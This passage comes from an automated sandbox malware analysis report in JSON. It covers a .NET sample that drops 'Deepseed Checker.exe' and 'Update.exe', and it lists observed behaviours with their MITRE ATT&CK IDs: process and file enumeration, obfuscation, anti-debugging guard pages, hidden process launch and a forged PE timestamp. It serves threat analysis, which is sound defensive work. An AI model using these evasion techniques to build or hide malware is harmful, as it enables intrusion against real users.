00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_mscorsec.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_system.configuration.install.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_system.data.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_system.enterpriseservices.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_VsaVb7rt.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter sbs_wminet_utils.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter SharedReg12.dll (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter v1.0.3705 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter v1.1.4322 (UID: 00000000-00003276)\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"FindNextFileW\" with parameter v2.0.50727 (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"Module32FirstW\" (Indicator: \"Module32First\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"Module32NextW\" (Indicator: \"Module32Next\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-475", "type": 2, "relevance": 1, "name": "Contains string like password/secret", "description": "Found string \"To log in, generate a password and paste it into the \\\"Login\\\" field. Don\\'t forget to save it, as you won\\'t be able to use the programme without it.\" (Indicator: \"password\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n file/memory contains long string with (Indicator: \"password\"; File: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"o log in, generate a password and paste it\" (Indicator: \"password\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"o log in, generate a password and paste it into the \\\"Login\\\" field. Don\\'t forget to save it, as you won\\'t be able to use the programme without it.\" (Indicator: \"password\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"rong password\" (Indicator: \"password\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"tarted generating password...\" (Indicator: \"password\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"string password = \"RVnTSbgYNjst\";\" (Indicator: \"password\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found string \"zip.Password = password;\" (Indicator: \"password\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-100", "relevance": 1, "name": "Contains ability to gather process details (Dotnet)", "description": "Observed function \"get_ProcessName\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"", "origin": "Static Parser", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"?y_.aw\"\n Heuristic match: \"`sy.mq\"\n Heuristic match: \"g\\.gh\"\n Pattern match: \"http://m73t6.coms\"\n Pattern match: \"microsoft.net/framework/v4.0.30319/\"\n Heuristic match: \"zation.formatters.so\"\n Heuristic match: \"^l>.aw\"\n Heuristic match: \";-.ge\"\n Heuristic match: \"0f4.at\"\n Heuristic match: \"d.tv\"\n Heuristic match: \"y.gp\"\n Heuristic match: \"p6(.bd\"\n Heuristic match: \",q.za\"\n Heuristic match: \"ged.vu\"\n Heuristic match: \"<`j.pn\"\n Heuristic match: \"g6sn*.au\"\n Pattern match: \"https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation.--\"\n Pattern match: \"http://schemas.microsoft.com/smi/2005/windowssettings\"\n Pattern match: \"http://schemas.microsoft.com/smi/2016/windowssettings\"\n Heuristic match: \"data.com\"\n Heuristic match: \"<section name=processmodel type=system.web.configuration.pro\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-169", "type": 2, "relevance": 1, "name": "Found mail related domain names", "description": "Observed email domain:\"rmmx.\" [Source: 8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0]\n Observed email domain:\"rmmx.\" [Source: 00000000-00002512.00000001.90116.010B2000.00000020.mdmp]\n Observed email domain:\"mx.j\" [Source: 00000000-00002512.00000001.90116.010B2000.00000020.mdmp]", "origin": "File/Memory", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-14", "type": 2, "name": "Found potential IP address in binary/memory", "description": "\"<IPv4>\"\n \"<IPv4>\"\n \"<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"una.UI2,<IPv4>,,4015e4865bda28a4\"\n Potential IP \"<IPv4>\" found in string \"ystem.Core,<IPv4>,,b77a5c561934e089\"\n \"4.0.0.0000000\"\n \"1.0.0.0000000\"\n Potential IP \"<IPv4>\" found in string \"kFe=<IPv4>\"\n Potential IP \"<IPv4>\" found in string \"n=<IPv4>, C\"\n Potential IP \"<IPv4>\" found in string \"ystem.Numerics,<IPv4>,,b77a5c561934e089,MSIL\"\n Potential IP \"<IPv4>\" found in string \"ystem.Windows.Forms,<IPv4>,,b77a5c561934e089\"\n Potential IP \"<IPv4>\" found in string \"ion=<IPv4>, Culture=neu\"\n Potential IP \"<IPv4>\" found in string \"sion=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" allowDefinition=\"Machi\"\n Potential IP \"<IPv4>\" found in string \"on=<IPv4>, Culture=neutral, PublicKey\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-601", "type": 2, "relevance": 1, "name": "Contains ability to communicate with network (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; Source: \"00000000-00003276-00000C29-412141301\")\n Found reference to API \"WinHttpOpen\" (Indicator: \"WinHttpOpen\"; Source: \"00000000-00003276-00000C29-412720075\")\n Found reference to API \"WinHttpOpenW\" (Indicator: \"WinHttpOpen\"; Source: \"00000000-00003276-00000C29-412720543\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "static-110", "relevance": 1, "name": "Contains ability to provide interface for network protocols (Dotnet)", "description": "Observed namespace \"System.Net\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"\n Observed namespace \"System.Net.Http\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"", "origin": "Static Parser", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-150", "relevance": 1, "name": "Dotnet code contains ability to generate random numbers", "description": "Observed namespace \"System.Security.Cryptography.RNGCryptoServiceProvider\" and TypeReference \".ctor\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"\n Observed namespace \"System.Security.Cryptography.RandomNumberGenerator\" and TypeReference \"GetNonZeroBytes\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-118", "relevance": 1, "name": "Contains ability to perform crypto operations", "description": "Observed namespace \"System.Security.Cryptography\" in [Source: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"]", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "binary-71", "type": 8, "relevance": 1, "name": "Sample file has high entropy (likely encrypted/compressed content)", "description": "Sample file \"sample.bin\" has high entropy 7.971099125385583", "origin": "Binary File", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains CRYPTO related strings\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains ability to perform crypto operations\n Matched sigs: Calls an API typically used to import cryptographic keys into a CSP\n Matched sigs: Dropped file has high entropy (likely encrypted/compressed content)\n Matched sigs: Sample file has high entropy (likely encrypted/compressed content)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00002512.00000000.89952.00470000.00000004.mdmp, 00000000-00002512.00000001.90116.00470000.00000004.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00003276.00000000.89057.00360000.00000004.mdmp, 00000000-00003276.00000001.89703.00360000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\infstor.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003276.00000001.89703.00360000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\infstrng.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003276.00000001.89703.00360000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\drvindex.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003276.00000001.89703.00360000.00000004.mdmp\")\n Found string \"\\Windows\\System32\\DriverStore\\FileRepository\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00003276.00000001.89703.00360000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" called an API \"AdjustTokenPrivileges\" (UID: 00000000-00003276)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"NtWriteFile\" (Indicator: \"NtWriteFile\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" opened \"\\Device\\KsecDD\"\n \"Deepseed Checker.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"SEARCHLIST\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPV6DOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"NAMESERVER\"; Value: \"\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPNAMESERVER\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Searches\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Videos\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Pictures\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Contacts\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Favorites\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Music\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Downloads\\desktop.ini\"\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-3", "relevance": 10, "name": "Timestamp in PE header is very old or in the future", "description": "\"Deepseed Checker.exe\" claims program is from Mon Aug 13 13:14:09 2068", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"Update.exe\" claimed CRC 4127108 while the actual is CRC 5184831", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "CreateToolhelp32Snapshot\n VirtualProtect\n LoadLibraryA\n GetProcAddress\n MapViewOfFile\n GetModuleHandleA\n CreateFileMappingA\n CreateFileW\n Sleep\n VirtualAlloc", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" wrote 16384 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hAifIHNdlq\\Deepseed Checker.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" wrote 16384 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\QknqBASLBEmK\\Update.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"Deepseed Checker.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\hAifIHNdlq\\Deepseed Checker.exe]- [targetUID: 00000000-00002512]\n \"Update.exe\" has type \"PE32+ executable (GUI) x86-64 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\QknqBASLBEmK\\Update.exe]- [targetUID: 00000000-00003276]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" at 00000000-00003276-00000105-5354664\n \"Deepseed Checker.exe\" at 00000000-00002512-00000105-6212787", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "static-161", "relevance": 1, "name": "Contains ability execute applications in hidden mode (Dotnet)", "description": "Observed Namespace \"System.Diagnostics.ProcessStartInfo\" and MemberReference \"set_CreateNoWindow\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"\n Observed Namespace \"System.Diagnostics.ProcessStartInfo\" and MemberReference \"set_CreateNoWindow\" in \"Deepseed Checker.exe\"", "origin": "Static Parser", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" has section name .text with entropy \"7.9791231358\"\n \"Deepseed Checker.exe\" has section name .text with entropy \"7.97515530422\"\n \"Update.exe\" has section name .text with entropy \"6.31629598262\"\n \"Update.exe\" has section name .rdata with entropy \"7.97277997928\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 3276)\n \"Deepseed Checker.exe\" is 